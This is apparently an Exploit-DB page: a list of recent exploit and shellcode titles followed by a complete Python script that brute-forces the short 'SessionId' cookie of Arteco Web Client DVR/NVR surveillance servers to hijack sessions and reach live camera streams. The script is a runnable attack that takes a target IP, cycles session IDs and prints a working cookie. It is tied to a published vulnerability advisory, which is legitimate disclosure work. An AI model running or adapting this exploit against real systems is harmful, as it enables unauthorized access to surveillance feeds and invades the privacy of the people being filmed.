
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
100 lines
No EOL
3.2 KiB
Python
Executable file
100 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
|
|
# Date: 16.11.2020
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.arteco-global.com
|
|
|
|
#!/usr/bin/env python3
|
|
#
|
|
#
|
|
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
|
|
#
|
|
#
|
|
# Vendor: Arteco S.U.R.L.
|
|
# Product web page: https://www.arteco-global.com
|
|
# Affected version: n/a
|
|
#
|
|
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
|
|
# ideal for those who need to manage IP video surveillance designed for
|
|
# medium to large installations that require high performance and reliability.
|
|
# Arteco can handle IP video sources from all major international manufacturers
|
|
# and is compatible with ONVIF and RTSP devices.
|
|
#
|
|
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
|
|
# exploited by brute force, which may allow a remote attacker to obtain a
|
|
# valid session, bypass authentication and disclose the live camera stream.
|
|
#
|
|
# Tested on: Microsoft Windows 10 Enterprise
|
|
# Apache/2.4.39 (Win64) OpenSSL/1.0.2s
|
|
# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
|
|
# Arteco-Server
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2020-5613
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
|
|
#
|
|
#
|
|
# 16.11.2020
|
|
#
|
|
|
|
import sys,requests
|
|
|
|
class BrutusCookius:
|
|
|
|
def __init__(self):
|
|
self.validate=None
|
|
self.cookies=None#
|
|
self.params=None##
|
|
self.stream=None##
|
|
self.path=None####
|
|
self.cgi=None#####
|
|
self.ip=None######
|
|
self.op=None######
|
|
|
|
def check(self):
|
|
print('Usage: ./arteco.py IP')
|
|
exit(9)
|
|
|
|
def bro(self):
|
|
if len(sys.argv) !=2:
|
|
self.check()
|
|
else:
|
|
self.ip=sys.argv[1]
|
|
print('[+] Target IP: '+self.ip)
|
|
if not 'http' in self.ip:
|
|
self.ip='http://{}'.format(self.ip)
|
|
|
|
def force(self):
|
|
|
|
# Check the Set-Cookie on the target and determine the length (varies per model/version)
|
|
# Cookie: SessionId=15800 - range(10000,100000)
|
|
# Cookie: SessionId=8350 - range(1000,10000)
|
|
# Cookie: SessionId=502 - range(100,1000)
|
|
|
|
self.op = range(17129,17149) # Tweak
|
|
for j in self.op:
|
|
session=requests.session()
|
|
self.cookies=dict(SessionId=str(j))
|
|
sys.stdout.write('[+] Trying ID: '+str(j))
|
|
self.path='/arteco-mobile/'
|
|
self.cgi='camera.fcgi'
|
|
self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
|
|
self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
|
|
if not 'artecomobile' in str(self.validate):
|
|
print(' - NOPE.')
|
|
else:
|
|
print(' - BINGO!!!')
|
|
print('[+] Active session found: '+str(j))
|
|
print('[+] Use the cookie: SessionId='+str(j))
|
|
exit(9)
|
|
print('[!] Sorry, no valid session found.')
|
|
|
|
def main(self):
|
|
self.bro()
|
|
self.force()
|
|
|
|
if __name__ == '__main__':
|
|
BrutusCookius().main() |